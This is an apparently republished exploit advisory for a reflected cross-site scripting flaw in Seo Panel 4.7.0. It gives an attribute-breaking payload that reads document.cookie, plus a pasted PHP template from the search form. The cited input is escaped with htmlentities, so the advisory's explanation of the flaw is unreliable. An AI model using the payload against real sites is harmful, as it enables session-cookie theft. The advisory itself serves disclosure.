Seo Panel 4.7.0 Cross Site Scripting
2024-4-6 02:5:14 Author:查看原文) 阅读量:0 收藏

# Exploit Title: Seo Panel 4.7.0 Reflected XSS
# Exploit Author: Arzu DEMÝREZ
# Date: 05.03-2024
# Vendor Homepage:
# Software Link:
# Version: Seo Panel 4.7.0

A cross-site scripting (XSS) issue in the SEO admin login panel version 4.7.0 allows remote attackers to inject JavaScript.

- used:
x" onmouseover=alert(document.cookie) x="

Review Of Analysis:
Ýn archive.ctp.php file include search_form and search_name input load on that script at line 71 as
<a href="javascript:void(0);" onclick="scriptDoLoadPost('archive.php', 'search_form', 'content')" class="actionbut"><?php echo $spText['button']['Search']?></a>
because of that an attacker if send that code
x" onmouseover=alert(document.cookie) x="
can exploit the victim.

<form id='search_form'>
<table width="100%" class="search">
<th><?php echo $spText['common']['Name']?>: </th>
<input type="text" name="search_name" value="<?php echo htmlentities($searchInfo['search_name'], ENT_QUOTES)?>" onblur="<?php echo $submitLink?>">
<th><?php echo $spText['common']['Period']?>:</th>
<td colspan="2">
<input type="text" value="<?php echo $fromTime?>" name="from_time" id="from_time_summary"/>
<input type="text" value="<?php echo $toTime?>" name="to_time" id="to_time_summary"/>
$( function() {
$( "#from_time_summary, #to_time_summary").datepicker({dateFormat: "yy-mm-dd"});
} );
<th><?php echo $spText['common']['Website']?>: </th>
<select name="website_id" id="website_id" onchange="scriptDoLoadPost('archive.php', 'search_form', 'content')" style="width: 180px;">
<option value="">-- <?php echo $spText['common']['Select']?> --</option>
<?php foreach($siteList as $websiteInfo){?>
<?php if($websiteInfo['id'] == $websiteId){?>
<option value="<?php echo $websiteInfo['id']?>" selected><?php echo $websiteInfo['name']?></option>
<?php }else{?>
<option value="<?php echo $websiteInfo['id']?>"><?php echo $websiteInfo['name']?></option>
<?php }?>
<?php }?>
<th><?php echo $spText['label']['Report Type']?>: </th>
<select name="report_type" id="report_type" onchange="scriptDoLoadPost('archive.php', 'search_form', 'content')" style="width: 210px;">
<option value="">-- <?php echo $spText['common']['Select']?> --</option>
<?php foreach($reportTypes as $type => $info){?>
<?php if($type == $searchInfo['report_type']){?>
<option value="<?php echo $type?>" selected><?php echo $info?></option>
<?php }else{?>
<option value="<?php echo $type?>"><?php echo $info?></option>
<?php }?>
<?php }?>
<a href="javascript:void(0);" onclick="scriptDoLoadPost('archive.php', 'search_form', 'content')" class="actionbut"><?php echo $spText['button']['Search']?></a>

Saygýlarýmla / Best Regards,

